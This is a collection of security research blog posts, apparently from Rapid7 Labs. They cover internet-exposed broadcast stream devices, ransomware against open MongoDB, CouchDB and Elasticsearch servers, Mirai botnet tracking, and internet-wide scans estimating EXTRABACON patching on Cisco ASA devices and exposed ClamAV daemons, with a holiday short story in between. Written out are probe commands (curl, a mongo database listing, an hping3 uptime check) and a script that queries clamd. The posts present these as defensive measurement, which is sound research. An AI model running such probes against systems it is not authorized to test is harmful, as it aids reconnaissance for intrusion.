We reviewed the January 31, 2017 port 80 scan data set from Rapid7's Project Sonar to try to identify Barix Instreamer/Exstreamer devices and Pkyo devices based on some key string markers we identified from a cadre of PDF manuals. We found over a thousand of them listening on port 80 and accessible without authentication. They seem to be somewhat popular on almost every continent and are especially popular here in the United States. Many of these devices have their administration interfaces on something besides port 80, so this is likely just a sample of the scope of the problem. Because they operate in pairs, once you gain access to one device, you can learn about its counterpart directly from the administration screens. It's trivial to reconfigure either the source or destination points to send or receive different streams, and it's likely these devices go untouched for months or even years. It's also trivial to create a script to push a new configuration to all the devices very quickly (we estimated five minutes or less).

What is truly alarming is not only that these devices are set up to be on the internet without any sort of authentication, but that this issue has been brought up several times in the past. The exposure — which in this case is really a misconfiguration issue and not strictly a software vulnerability — was identified as early as April 2016, and this specific hijacking technique emerged shortly after the inauguration.

Coming Out of a Spot

The obvious question is: if this issue was identified nearly a year ago, why are there still susceptible systems on the internet? The answer is that just because an issue is identified does not automatically mean that the individuals responsible for securing the affected systems are aware that they are vulnerable, or of what the impact would be. As much as we as an industry talk about information sharing, often we aren't sharing the right information with the right people. Station owners and operators do not always have a technical or security background, and may not read the security news or blogs. Even when the mainstream media published information on the impacted model and version, system operators may not know that they are using that particular model for their broadcast, or they may simply miss the brief media exposure. We cannot and should not assume that people are aware of the issues that are discovered, and therefore we are making a greater effort to inform U.S.
station owners by reaching out to them directly in coordination with the National Coordinating Center for Communications (COMM-ISAC) and the National Association of Broadcasters (NAB). We've offered not only to inform these operators that they are vulnerable, but also to help them understand the technical measures that are required to secure their systems, down to walking through how to set a password. What is intuitive to some is not always intuitive to others.

Cross Fade Out

While hijacking a station to play offensive music is certainly not good, the situation could have been — and still can be — much more serious. There are significant political tensions in the U.S. right now, and a coordinated attack against the nearly 300 devices we identified in this country could cause targeted chaos and panic. Considering how easy it is to access and take control of these devices, a coordinated hijacking of these broadcast streams is not such a far-fetched scenario, so it is imperative to secure these systems to reduce the potential impact of future attacks. You can reach out to research@rapid7.com for more information about the methodology we used to identify and validate the status of these devices.
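If you operate this kind of gear, a minimal self-check sketch follows (my own illustration; device.example and the grep pattern are placeholders, not the actual fingerprints we used):

# An HTTP 200 on the admin page with no authentication challenge is a bad sign
$ curl -s -o /dev/null -w '%{http_code}\n' http://device.example/
# Look for a device-identifying marker in the page (placeholder pattern)
$ curl -s http://device.example/ | grep -i 'exstreamer'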

The Ransomware Chronicles: A DevOps Survival Guide

NOTE: Tom Sellers, Jon Hart, Derek Abdine and (really) the entire Rapid7 Labs team made this post possible.

On the internet, no one may know if you're of the canine persuasion, but with a little time and just a few resources they can easily determine whether you're running an open "devops-ish" server or not. We're loosely defining devops-ish as:

- MongoDB
- CouchDB
- Elasticsearch

for this post, but we have a much broader definition and more data coming later this year. We use the term "devops" as these technologies tend to be used by individuals or shops that are emulating the development and deployment practices found in the "DevOps" — https://en.wikipedia.org/wiki/DevOps — communities. Why are we focusing on devops-ish servers? I'm glad you asked!

The Rise of Ransomware

If you follow IT news, you're likely aware that attackers who are focused on ransomware for revenue generation have taken to the internet searching for easy marks to prey upon. In this case the would-be victims are those running production database servers directly connected to the internet with no authentication. Here's a smattering of news articles on the subject:

- MongoDB mauled! http://www.zdnet.com/article/mongodb-ransacked-now-27000-databases-hit-in-mass-ransom-attacks/
- Elasticsearch exposed! http://www.pcworld.com/article/3157417/security/after-mongodb-ransomware-groups-hit-exposed-elasticsearch-clusters.html
- CouchDB crushed! http://www.pcworld.com/article/3159527/security/attackers-start-wiping-data-from-couchdb-and-hadoop-databases.html

The core reason attackers are targeting devops-ish technologies is that most of these servers have default configurations which have tended to be wide open (i.e. they listen on all IP addresses and have no authentication) to facilitate easy experimentation and exploration. Said configuration means you can give a new technology a test on your local workstation to see if you like the features or API, but it also means that — if you're not careful — you'll be exposing real data to the world if you deploy them the same way on the internet.

Attackers have been ramping up their scans for these devops-ish services. We've seen this activity in our network of honeypots (Project Heisenberg), and we'll be showing probes for more services, including CouchDB, in an upcoming post/report. When attackers find targets, they often take advantage of these open configurations by encrypting the contents of the databases and leaving little "love notes" in the form of table names or index names with instructions on where to deposit bitcoins to get the keys back to your data. In other cases, the contents of the databases are dumped and kept by the attacker but wiped from the target, with a ransom then demanded for the return of the kidnapped data. In still other cases, the data is wiped from the target and not kept by the attackers, leaving anyone who gives in to these demands in for a double whammy: paying the ransom and not getting any data in return.

Not all exposed and/or ransomed services contain real data, but attackers have automated the process of finding and encrypting target systems, so it doesn't matter to them if they corrupt test databases that will just get deleted, as it hasn't cost them any more time or money to do so. And, because the captive systems are still wide open, there have been cases where multiple attacker groups have encrypted systems — at least they fight amongst themselves as well as attack you.
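Before we get to the numbers, here is a minimal sketch of checking whether one of your own MongoDB instances is in that wide-open state (my own illustration; 198.51.100.10 is a placeholder address and the mongo shell client is assumed to be installed):

# If this returns a database list without any credentials, the instance is
# exposed in exactly the way the attackers described above are hunting for
$ mongo --host 198.51.100.10 --eval 'printjson(db.adminCommand({listDatabases: 1}))'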
Herding Servers on the Wide-Open Range Internet

Using Project Sonar — http://sonar.labs.rapid7.com — we surveyed the internet for these three devops databases. NOTE: we have a much larger ongoing study that includes a myriad of devops-ish and "big data" technologies, but we're focusing on these three servers for this post given the timeliness of their respective attacks.

We try to be good Netizens, so we have more rules in place when it comes to scanning than others do. For example, if you ask us not to scan your internet subnet, we won't. We will also never perform scans requiring credentials/authentication. Finally, we're one of the more prominent telemetry gatherers, which means many subnets choose to block us. I mention this first since many readers will be apt to compare our numbers with the results from their own scans or from other telemetry resources. Scanning the internet is a messy bit of engineering, science and digital alchemy, so there will be differences between various researchers. We found:

- ~56,000 MongoDB servers
- ~18,000 Elasticsearch servers
- ~4,500 CouchDB servers

Of those, 50% of MongoDB servers were captive, 58% of Elasticsearch were captive and 10% of CouchDB servers were captive. A large percentage of each of these devops-ish databases are in "the cloud", and several of the providers do offer secure deployment guides like this one for MongoDB from DigitalOcean: https://www.digitalocean.com/community/tutorials/how-to-securely-configure-a-production-mongodb-server. However, others have no such guides, or have broken links to such guides, and most do not offer base images that are secure by default when it comes to these services.

Exposed and Unaware

If you do run one of these databases on the internet, it would be wise to check your configuration to ensure that you are not exposing it to the internet, or at the very least have authentication enabled and rudimentary network security groups configured to limit access. Attackers are continuing to scan for open systems and will continue to encrypt and hold systems for ransom. There's virtually no risk in it for them and it's extremely easy money, since the reconnaissance for and subsequent attacking of exposed instances likely often happens from behind anonymization services or from unwitting third-party nodes compromised previously.

Leaving the configuration open can cause other issues beyond the exposure of the functionality provided by the service(s) in question. Over 100 of the CouchDB servers are exposing some form of PII (going solely by table/db name), and much larger percentages of the open MongoDB and Elasticsearch databases seem to have some interesting data available as well. Yes, we can see your table/database names. If we can, so can anyone who makes a connection attempt to your service. We (and attackers) can also see configuration information, meaning we know just how out of date your servers, like MongoDB, are. So, while you're checking how secure your access configurations are, it may also be a good time to ensure that you are up to date on the latest security patches (the story is similarly sad for CouchDB and Elasticsearch).

What Can You Do?

Use automation (most of you are deploying in the cloud) and within that automation use secure configurations.
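For example, a minimal sketch of what that can look like for MongoDB specifically (flags from the stock mongod binary; adapt for your init system or mongod.conf):

# Listen only on localhost and require authentication; anything that needs
# remote access should go through a VPN/SSH tunnel or a tightly scoped
# security group rather than a 0.0.0.0 listener
$ mongod --auth --bind_ip 127.0.0.1 --dbpath /var/lib/mongodb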
Each of the three technologies mentioned has a security guide that "comes with" it:

- CouchDB: http://docs.couchdb.org/en/2.0.0/intro/security.html
- Elasticsearch: https://www.elastic.co/blog/found-elasticsearch-security
- MongoDB: https://docs.mongodb.com/manual/security/

It's also wise to configure your development and testing environments the same way you do production (hey, you're the one who wanted to play with devops-ian technologies, so why not go full monty?). You should also configure your monitoring services and vulnerability management program to identify and alert if your internet-facing systems are exposing an insecure configuration. Even the best shops make deployment mistakes on occasion.

If you are a victim of a captive server, there is little you can do to recover outside of restoring from backups. If you don't have backups, it's up to you to decide just how valuable your data is/was before you consider paying a ransom. If you are a business, also consider reporting the issue to the proper authorities in your locale as part of your incident response process.

What's Next?

We're adding more devops-ish and data-science-ish technologies to our Sonar scans and Heisenberg honeypots and putting together a larger report to help provide context on the state of the exposure of these services and to try to give you some advance notice as to when attackers are preying on new server types. If there are database or server technologies you'd like us to include in our more comprehensive study, drop a note in the comments or to research@rapid7.com.

Burning sky header image by photophilde, used CC-BY-SA

12 Days of HaXmas: A HaXmas Carol


(A Story by Rapid7 Labs)

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

Happy Holi-data from Rapid7 Labs! It's been a big year for the Rapid7 elves Labs team. Our nigh 200-node strong Heisenberg Cloud honeypot network has enabled us to bring posts & reports such as The Attacker's Dictionary, Cross-Cloud Adversary Analytics and Mirai botnet tracking to the community, while Project Sonar fueled deep dives into National Exposure as well as ClamAV, fuel tanks and tasty, tasty EXTRABACON. Our final gift of the year is the greatest gift of all: DATA! We've sanitized an extract of our November 2016 cowrie honeypot data from Heisenberg Cloud. While not the complete data set, it should be good for hours of fun over the holiday break. You can e-mail research [at] rapid7 [dot] com if you have any questions or leave a note here in the comments. While you're waiting for that to download, please enjoy our little HaXmas tale…

Once upon a HaXmas eve…

CISO Scrooge sat sullen in his office. His demeanor was sour as he reviewed the day's news reports and sifted through his inbox, but his study was soon interrupted by a cheery minion's “Merry HaXmas, CISO!”

CISO Scrooge replied, “Bah! Humbug!”

The minion was taken aback. “HaXmas a humbug, CISO?! You surely don't mean it!”

“I do, indeed…” grumbled Scrooge. “What is there to be merry about? Every day attackers are compromising sites, stealing credentials and bypassing defenses. It's almost impossible to keep up. What's more, the business units and app teams here don't seem to care a bit about security. So, I say it again: ‘Merry HaXmas?' HUMBUG!”

Scrooge's minion knew better than to argue and quickly fled to the comforting glow of the pew-pew maps in the security operations center. As CISO Scrooge returned to his RSS feeds, his office lights dimmed and a message popped up on his laptop, accompanied by a disturbing “clank” noise (very disturbing indeed, since he had the volume completely muted). No matter how many times he dismissed the popup it returned, clanking all the louder. He finally relented and read the message: “Scrooge, it is required of every CISO that the defender spirit within them should stand firm with resolve in the face of their adversaries. Your spirit is weary and your minions are discouraged. If this continues, all your security plans will be for naught and attackers will run rampant through your defenses. All will be lost.”

Scrooge barely finished uttering, “Hrmph. Nothing but a resourceful security vendor with a crafty marketing message. My ad blocker must be misconfigured and that bulb must have burned out.”

“I AM NO MISCONFIGURATION!” appeared in the message stream, followed by, “Today, you will be visited by three cyber-spirits. Expect their arrivals on the top of each hour. This is your only chance to escape your fate.” Then the popup disappeared and the office lighting returned to normal. Scrooge went back to his briefing and tried to put the whole thing out of his mind.

The Ghost of HaXmas Past

CISO Scrooge had long finished sifting through news and had moved on to reviewing the first draft of their PCI DSS ROC[i].
His eyes grew heavy as he combed through the tome until he was startled by a bright green light and the appearance of a slender man in a tan plaid 1970's business suit holding an IBM 3270 keyboard.

“Are you the cyber-spirit, sir, whose coming was foretold to me?” asked Scrooge.

“I am!” replied the spirit. “I am the Ghost of HaXmas Past! Come, walk with me!”

As Scrooge stood up, they were seemingly transported to a room full of mainframe computers with workers staring drone-like into green-screen terminals. “Now, this was security, spirit!” exclaimed Scrooge. “No internet… no modems… granular RACF[ii] access control…” (Scrooge was beaming almost as brightly as the spirit!)

“So you had been successful securing your data from attackers?” asked the spirit.

“Well, yes, but this is when we had control! We had the power to give or deny anyone access to critical resources with a mere series of arcane commands.” As soon as he said this, CISO Scrooge noticed the spirit moving away and motioning him to follow. When he caught up, the scene changed to a cubicle-lined floor filled with desktop PCs.

“What about now? Were these systems secure?” inquired the spirit.

“Well, yes. It wasn't as easy as it was with the mainframe, but as our business tools changed and we started interacting with clients and suppliers on the internet, we found solutions that helped us protect our systems and networks and gave us visibility into the new attacks that were emerging,” remarked CISO Scrooge. “It wasn't easy. In fact, it was much harder than the mainframe, but the business was thriving: growing, diversifying and moving into new markets. If we had stayed in a mainframe mindset we'd have gone out of business.”

The spirit replied, “So, as the business evolved, so did the security challenges, but you had resources to protect your data?”

“Well, yes. But these were just PCs. No laptops or mobile phones. We still had control!” noted Scrooge.

“That may be,” noted the spirit, “but if we continued our journey, would this not be the pattern? Technology and business practices change, but there have always been solutions to security problems coming at the same pace?” CISO Scrooge had to admit that, as he looked back in his mind, there had always been ways to identify and mitigate threats as they emerged. They may not have always been 100% successful, but the benefits of the “new” to the business were far more substantial than the possible issues that came with it.

The Ghost of HaXmas Present

As CISO Scrooge pondered the spirit's words, he realized he was back at his desk, his screen having locked due to the required inactivity timeout. He gruffed a bit (he couldn't understand the 15-minute lock timeout any more than you probably can) and fumbled three attempts at his overly complex password to unlock the screen before he was logged back in. His PCI DSS ROC was minimized and his browser was on a MeTube video (despite the site being blocked on the proxy server). He knew he had no choice but to click “play”. As he did, it seemed to be a live video of the Mooncents coffee shop down the street buzzing with activity. He was seamlessly transported from remote viewer to being right in the shop, next to a young woman in bespoke, authentic, urban attire, sipping a double ristretto venti half-soy nonfat decaf organic chocolate brownie iced vanilla double-shot gingerbread frappuccino. Amongst the patrons were people on laptops, tablets and phones, many of them conducting business for CISO's company. “Dude.
I am the spirit of HaXmas Present,” she said softly, as her gaze fixated upon a shadowy figure in the corner. CISO Scrooge turned his own gaze in that direction and noticed a hoodie-clad figure with a sticker-laden laptop. Next to the laptop was a device that looked like a wireless access point, and Scrooge could just barely hear the figure chuckling to himself as his fingers danced across the keyboard.

“Is that person doing what I think he's doing?” Scrooge asked the spirit.

“Indeed,” she replied. “He's set up a fake Mooncents access point and is intercepting all the comms of everyone connected to it.”

Scrooge's eyes got wide as he exclaimed, “This is what I mean! These people are just like sheep being led to the shearer. They have no idea what's happening to them! It's too easy for attackers to do whatever they want!”

As he paused for a breath, the spirit gestured to a woman who had just sat down in the corner and opened her laptop, prompting Scrooge to go look at her screen. The woman did work at CISO's company and she was in Mooncents on her company device, but — much to the surprise of Scrooge — as soon as she entered her credentials, she immediately fired up the VPN Scrooge's team had set up, ensuring that her communications would not be spied upon. The woman never once left her laptop alone and seemed to be very aware of what she needed to do to stay as safe as possible.

“Do you see what is happening?” asked the spirit. “Where and how people work today are not as fixed as they were in the past. You have evolved your corporate defenses to the point that attackers need to go to lengths like this, or trick users through phishing, to get what they desire.”

“Technology I can secure. But how do I secure people?!” sighed Scrooge.

“Did not this woman do what she needed to keep her and your company's data safe?” asked the spirit.

“Well, yes. But it's so much more work!” noted Scrooge. “I can't install security on users. I have to make them aware of the threats and then make it as easy as possible for them to work securely no matter where they are!”[iii]

As soon as he said this, he realized that this was just the next stage in the evolution of the defenses he and his team had been putting into place. The business-growing power inherent in this new mobility, and the solid capabilities of his existing defenses, forced attackers to behave differently, and he understood that he and his team probably needed to as well. The spirit gave a wry, ironic grin at seeing Scrooge's internal revelation. She handed him an infographic titled “Ignorance & Want” that showcased why it was important to make sure employees were well-informed, to stay in tune with how users want to work, and to make sure his company's IT offerings were as easy to use and functional as all the shiny “cloud” apps.

The Ghost of HaXmas Future

As Scrooge took hold of the infographic, the world around him changed. A dark, dystopian scene faded into view. Buildings were in shambles and people were moving in zombie-like fashion in the streets. A third, cloaked spirit appeared next to him and pointed towards a disheveled figure hulking over a fire in a barrel. An “eyes” emoji appeared on the OLED screen where the spirit's face should have been. CISO Scrooge didn't even need to move closer to see that it was a future version of himself, struggling to keep warm to survive in this horrible wasteland.

“Isn't this a bit much?” inquired Scrooge. The spirit shrugged and a “whatever” emoji appeared on the screen.

Scrooge continued, “I think I've got the message.
Business processes will keep evolving and moving faster and will never be tethered and isolated again. I need to stay positive and constantly evolve — relying on psychology and education as well as technology — to address the new methods attackers will be adopting. If I don't, it's ‘game over'.”

The spirit's screen flashed a “thumbs up” emoji and CISO Scrooge found himself back at his desk, infographic strangely still in hand, his HaXmas spirit fully renewed. He vowed to keep HaXmas all the year through from now on.

[i] Payment Card Industry Data Security Standard Report on Compliance
[ii] http://www-03.ibm.com/systems/z/os/zos/features/racf/
[iii] Scrooge eventually also realized he could make use of modern tools such as InsightIDR to combine security & threat event data with user behavior analysis to handle the cases where attackers do successfully breach users.

Election Day: Tracking the Mirai Botnet


by Bob Rudis, Tod Beardsley, Derek Abdine & the Rapid7 Labs Team

What do I need to know?

Over the last several days, the traffic generated by the Mirai family of botnets has changed. We've been tracking the ramp-up and draw-down patterns of Mirai botnet members and have seen the peaks associated with each reported large-scale and micro attack since the DDoS attack against Dyn, Inc. We've tracked over 360,000 unique IPv4 addresses associated with Mirai traffic since October 8, 2016 and have been monitoring another ramp-up in activity that started around November 4, 2016. At mid-day on November 8, 2016 the traffic volume was as high as the entire day on November 6, 2016, with all indications pointing to a probable significant increase in botnet node accumulation by the end of the day.

We've also been tracking the countries of origin for the Mirai family traffic. Specifically, we've been monitoring the top 10 countries with the highest number of daily Mirai nodes. This list has been surprisingly consistent since October 8, 2016. However, on November 6, 2016 the U.S. dropped out of the top 10 originating countries. As we dug into the data, we noticed a significant and sustained drop-off of Mirai nodes from two internet service providers. There are no known impacts from this recent build-up, but we are continuing to monitor the Mirai botnet family patterns for any sign of significant change.

What is affected?

The Mirai botnet was initially associated with various components of the “internet of things”, specifically internet-enabled cameras, DVRs and other devices not generally associated with malicious traffic or malware infections. There are also indications that variants of Mirai may be associated with traditional computing environments, such as Windows PCs. As we've examined the daily Mirai data, a large percentage of connections in each country come from autonomous systems — large blocks of internet addresses owned by a single provider of network services — associated with residential or small-business internet service provider networks.

How serious is this?

Regardless of the changes we've seen in the Mirai botnet over the last several days, we still do not expect Mirai, or any other online threat, to have an impact on the 2016 United States Presidential Election. The ballot and voting systems in use today are overwhelmingly offline, administered in approximately 3,000 counties and parishes across the country. Mounting an effective, coordinated, remote attack on these systems is nigh impossible. The most realistic worst-case scenarios we envision for cyber-hijinks this election day are website denial-of-service attacks, which can impact how people get information about the election. These attacks may (or may not) be executed against voting and election information websites operated by election officials, local and national news organizations, or individual campaigns. If early voting reports are any indication, we expect to see more online interest in this election than the last presidential election, and correspondingly high levels of engagement with election-related websites. Therefore, even if an attack were to occur, it may be difficult for website users to distinguish it from a normal outage due to volume. For more information on election hacking, read this post.

How did we find this?

We used our collection of Heisenberg Cloud honeypots to capture telnet session data associated with the behavior of the Mirai botnet family.
Heisenberg Cloud consists of 136 honeypot nodes spread across every region/zone of six major cloud providers. The honeypot nodes track only connection attempts and basic behavior within those connections; they are not configured to respond to, or decode/interpret, Mirai commands.

What was the timeline?

The overall Mirai tracking period covers October 8, 2016 through today, November 8, 2016. All data and charts provided in this report use an extract of data from October 30, 2016 through November 8, 2016.
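As an illustration of the sort of tally behind the country rankings above, here's a minimal sketch (not our production pipeline; the file name and column names are hypothetical) that counts unique Mirai source IPs per country per day from an export of honeypot telnet sessions:

import csv
from collections import defaultdict

# (day, country) -> set of unique source IPs seen that day
daily_nodes = defaultdict(set)

with open("mirai_sessions.csv", newline="") as f:   # hypothetical export
    for row in csv.DictReader(f):                   # columns: day, country, src_ip
        daily_nodes[(row["day"], row["country"])].add(row["src_ip"])

# Top 10 countries by unique node count for a single day
day = "2016-11-06"
counts = {c: len(ips) for (d, c), ips in daily_nodes.items() if d == day}
for country, n in sorted(counts.items(), key=lambda kv: -kv[1])[:10]:
    print(f"{country}: {n}")

Counting unique source IPs per day only approximates "nodes", since DHCP churn can make one infected device appear as several addresses; treat tallies like this as trend indicators rather than exact population counts.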

Bringing Home The EXTRABACON [Exploit]


by Derek Abdine & Bob Rudis (photo CC-BY-SA Kalle Gustafsson)

Astute readers will no doubt remember the Shadow Brokers leak of the Equation Group exploit kits and hacking tools back in mid-August. More recently, security researchers at SilentSignal noted that it was possible to modify the EXTRABACON exploit from the initial dump to work on newer Cisco ASA (Adaptive Security Appliance) devices, meaning that virtually all ASA devices (8.x to 9.2(4)) are vulnerable. We thought it would be interesting to dig into the vulnerability a bit more from a different perspective.

Now, "vulnerable" is an interesting word to use, since:

the ASA device must have SNMP enabled
an attacker must have the ability to reach the device via UDP SNMP (yes, SNMP can run over TCP, though it's rare to see it working that way) and know the SNMP community string
an attacker must also have telnet or SSH access to the device

This generally makes the EXTRABACON attack something that would occur within an organization's network, specifically from a network segment that has SNMP and telnet/SSH access to a vulnerable device. So, the world is not ending, the internet is not broken, and even if an attacker had the necessary access, they are just as likely to crash a Cisco ASA device as they are to gain command-line access to one by using the exploit. Even though there's a high probable loss magnitude[1] from a successful exploit, the threat capability[2] and threat event frequency[3] for attacks would most likely be low in the vast majority of organizations that use these devices to secure their environments.

Having said that, EXTRABACON is a pretty critical vulnerability in a core network security infrastructure device, and Cisco patches are generally quick and safe to deploy, so it would be prudent for most organizations to deploy the patch as soon as they can obtain and test it. Cisco did an admirable job responding to the exploit release and has a patch ready for organizations to deploy.

We here at Rapid7 Labs wanted to see if it was possible to both identify externally facing Cisco ASA devices and see how many of those devices were still unpatched. Unfortunately, most firewalls aren't going to have their administrative interfaces hanging off the public internet, nor are they likely to have telnet, SSH or SNMP enabled from the internet. So, we set our sights on using Project Sonar to identify ASA devices with SSL/IPsec VPN services enabled, since:

users generally access corporate VPNs over the internet (so we will be able to see them)
many organizations deploy SSL VPNs these days versus, or in addition to, IPsec (or other) VPNs (and we capture all SSL sites on the internet via Project Sonar)
these SSL VPN-enabled Cisco ASAs are easily identified

We found over 50,000 Cisco ASA SSL VPN devices in our most recent SSL scan. Keeping with the spirit of our recent National Exposure research, here's a breakdown of the top 20 countries:

Table 1: Device Counts by Country

Country | Device count | %
United States | 25,644 | 50.9%
Germany | 3,115 | 6.2%
United Kingdom | 2,597 | 5.2%
Canada | 1,994 | 4.0%
Japan | 1,774 | 3.5%
Netherlands | 1,310 | 2.6%
Sweden | 1,095 | 2.2%
Australia | 1,083 | 2.2%
Denmark | 1,026 | 2.0%
Italy | 991 | 2.0%
Russian Federation | 834 | 1.7%
France | 777 | 1.5%
Switzerland | 603 | 1.2%
China | 535 | 1.1%
Austria | 497 | 1.0%
Norway | 448 | 0.9%
Poland | 410 | 0.8%
Finland | 404 | 0.8%
Czech Republic | 396 | 0.8%
Spain | 289 | 0.6%

Because these are SSL VPN devices, we also have access to the certificates that organizations used to ensure confidentiality and integrity of the communications.
Most organizations have one or two (higher availability) VPN devices deployed, but many must deploy significantly more devices for geographic coverage or capacity needs:

Table 2: Organizations with ten or more VPN ASA devices

Organization | Count
Large Japanese telecom provider | 55
Large U.S. multinational technology company | 23
Large U.S. health care provider | 20
Large Vietnamese financial services company | 18
Large Global utilities service provider | 18
Large U.K. financial services company | 16
Large Canadian university | 16
Large Global talent management service provider | 15
Large Global consulting company | 14
Large French multinational manufacturer | 13
Large Brazilian telecom provider | 12
Large Swedish technology services company | 12
Large U.S. database systems provider | 11
Large U.S. health insurance provider | 11
Large U.K. government agency | 10

So What?

The above data is somewhat interesting on its own, but what we really wanted to know is how many of these devices had not been patched yet (meaning that they are technically vulnerable if an attacker is in the right network position). Remember, it's unlikely these organizations have telnet, SSH and SNMP enabled to the internet, and researchers in most countries, including those of us here in the United States, are not legally allowed to make credentialed scan attempts on these services without permission; actually testing for SNMP and telnet/SSH access would have let us identify truly vulnerable systems, but it was off the table.

After some bantering with the extended team (Brent Cook, Tom Sellers & jhart) and testing against a few known devices, we decided to use hping to determine device uptime from TCP timestamps and see how many devices had been rebooted since the release of the original exploits on (roughly) August 15, 2016. We modified our Sonar environment to enable hping studies and then ran the uptime scan across the target device IP list on August 26, 2016, so any system with an uptime greater than 12 days (and not employing some serious timestamp-masking techniques) was technically still vulnerable. Also remember that organizations who thought their shiny new ASA devices weren't vulnerable became vulnerable with the August 25, 2016 SilentSignal blog post (meaning that if it had seemed reasonable not to patch and reboot before, it stopped being reasonable on August 25).
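For the curious, here's roughly what that probe looks like with stock hping3 against a single (hypothetical) host; the --tcp-timestamp option samples the TCP timestamp option from SYN/ACK responses and estimates the remote system's clock rate and uptime. Output abridged, and, as always, probe only devices you own or are authorized to test:

$ hping3 -S -p 443 --tcp-timestamp -c 2 vpn.example.com
...
TCP timestamp: tcpts=1054021400
HZ seems hz=100
System uptime seems: 121 days, 23 hours, 3 minutes, 34 seconds

A device reporting an uptime that predates a patch's release can't have installed it, since applying an ASA software update requires a reload.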
So, how many of these organizations patched & rebooted? Well, nearly 12,000 (~24%) of them prevented us from capturing the timestamps. Of the remaining ones, here's how their patch status looks. We can also look at the distribution of uptime in a different way with a histogram, making 6-day buckets (so we can more easily see "Day 12"); this also shows the weekly patch/reboot cadence that many organizations employ. Let's go back to our organization list and see what the mean last-reboot time is for them:

Table 3: hping Scan Results (2016-08-26)

Organization | Count | Mean uptime (days)
Large Japanese telecom provider | 55 | 33
Large U.S. multinational technology company | 23 | 27
Large U.S. health care provider | 20 | 47
Large Vietnamese financial services company | 18 | 5
Large Global utilities service provider | 18 | 40
Large U.K. financial services company | 16 | 14
Large Canadian university | 16 | 21
Large Global talent management service provider | 15 | Unavailable
Large Global consulting company | 14 | 21
Large French multinational manufacturer | 13 | 34
Large Brazilian telecom provider | 12 | 23
Large Swedish technology services company | 12 | 4
Large U.S. database systems provider | 11 | 25
Large U.S. health insurance provider | 11 | Unavailable
Large U.K. government agency | 10 | 40

Two had no uptime data available, and two had rebooted (and likely patched) since the original exploit release.

Fin

We ran the uptime scan again after the close of the weekend (organizations may have waited until the weekend to patch/reboot after the latest exploit news) and here's how our list looked:

Table 4: hping Scan Results (2016-08-29)

Organization | Count | Mean uptime (days)
Large Japanese telecom provider | 55 | 38
Large U.S. multinational technology company | 23 | 31
Large U.S. health care provider | 20 | 2
Large Vietnamese financial services company | 18 | 9
Large Global utilities service provider | 18 | 44
Large U.K. financial services company | 16 | 18
Large Canadian university | 16 | 26
Large Global talent management service provider | 15 | Unavailable
Large Global consulting company | 14 | 25
Large French multinational manufacturer | 13 | 38
Large Brazilian telecom provider | 12 | 28
Large Swedish technology services company | 12 | 8
Large U.S. database systems provider | 11 | 26
Large U.S. health insurance provider | 11 | Unavailable
Large U.K. government agency | 10 | 39

Only one additional organization from our "top" list rebooted (and likely patched) since the previous scan — the health care provider, whose mean uptime dropped to 2 days — but an additional 4,667 devices from the full data set were rebooted (likely patched).

This bird's-eye view of how organizations have reacted to the initial and updated EXTRABACON exploit releases shows that some appear to have assessed the issue as serious enough to react quickly, while others have moved a bit more cautiously. It's important to stress, once again, that attackers need far more than external SSL access to exploit these systems. However, also note that the vulnerability is very real and impacts a wide array of Cisco devices beyond these SSL VPNs. So, while you may have assessed this as a low risk, it should not be forgotten, and you may want to ensure you have the most up-to-date inventory of which Cisco ASA devices you are using, where they are located, and the security configurations on the network segments with access to them. We just looked at a small, externally visible fraction of these devices and found that only 38% of them have likely been patched.

We're eager to hear how organizations assessed this vulnerability disclosure in order to make the update/no-update decision. So, if you're brave, drop a note in the comments or feel free to send a note to research@rapid7.com (all replies to that e-mail will be kept confidential).

[1], [2], [3] Open FAIR Risk Taxonomy [PDF]

Digging for Clam[AV]s with Project Sonar


A little over a week ago, some keen-eyed folks discovered a feature/configuration weakness in the popular ClamAV malware scanner that makes it possible to issue administrative commands such as SCAN or SHUTDOWN remotely—and without authentication—if the daemon happens to be running on an accessible TCP port. Shortly thereafter, Robert Graham unholstered his masscan tool and did a summary blog post on the extent of the issue on the public internet. The ClamAV team (which is a part of Cisco) did post a response, but the reality is that if you're running ClamAV on a server on the internet and have misconfigured it to listen on a public interface, you're susceptible to a trivial application denial-of-service attack and potentially susceptible to a file-system enumeration attack, since anyone can try virtually every conceivable path combination and see if they get a response.

Given that it has been some time since the initial revelation and discovery, we thought we'd add this as a regular scan study to Project Sonar to track the extent of the vulnerability and the cleanup progress (if any). Our first study run is complete, and the following are some of the initial findings.

Our study found 1,654,211 nodes responding on TCP port 3310. As we pointed out in our recent National Exposure research (and as Graham noted in his post), a great deal of this is "noise": large swaths of IP space are configured to respond "yes" to "are you there" queries to, amongst other things, thwart scanners. However, we only used the initial, lightweight "are you there" query to determine targets for subsequent full connections and ClamAV VERSION checks. We picked up many other types of servers running on TCP port 3310, including nearly:

16,000 squid proxy servers
600 nginx servers (20,000 HTTP servers in all)
500 database servers
600 SSH servers

But, you came here to learn about the ClamAV servers, so let's dig in.

Clam Hunting

We found 5,947 systems responding with a proper ClamAV response header to the VERSION query we submitted. Only having around 6,000 exposed nodes out of over 350 million PINGable nodes is nothing to get really alarmed about. It is still an egregious configuration error, however, and if you have this daemon exposed the same way on your internal network, it's a nice target for attackers who make their way past your initial defenses.

5,947 is a small enough number that we can easily poke around at the data a bit to see if we can find any similarities or learn any lessons. Let's take a look at the distribution of ClamAV versions. You can click on that chart to look at the details, but it's primarily there to show that virtually every ClamAV release version is accounted for in the study, with some dating back to 2004/2005. If we zoom in on the last part of the chart, we can see that almost half (2,528) of the exposed ClamAV servers are running version 0.97.5, which itself dates back to 2012. While I respect Graham's guess that these may have been unmaintained or forgotten appliances, there didn't seem to be any real pattern to them as we looked at DNS PTR records and other host metadata we collected. These all do appear to have been just "set and forget" installs, reinforcing our findings in the National Exposure report that there are virtually no barriers to entry for standing up or maintaining nodes on the internet.
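For reference, here's a minimal sketch of the kind of VERSION check described above; clamd speaks a simple newline-delimited text protocol on TCP port 3310 (the host address below is hypothetical, and, as always, only probe systems you're authorized to test):

import socket

def clamav_version(host, port=3310, timeout=5):
    """Send a clamd VERSION command and return the response line, or None."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"VERSION\n")
            return s.recv(256).decode("ascii", "replace").strip()
    except OSError:
        return None

print(clamav_version("198.51.100.7"))  # hypothetical host
# A response such as "ClamAV 0.97.5/21465/..." reveals the engine version,
# signature database version and signature date to anyone who asks.

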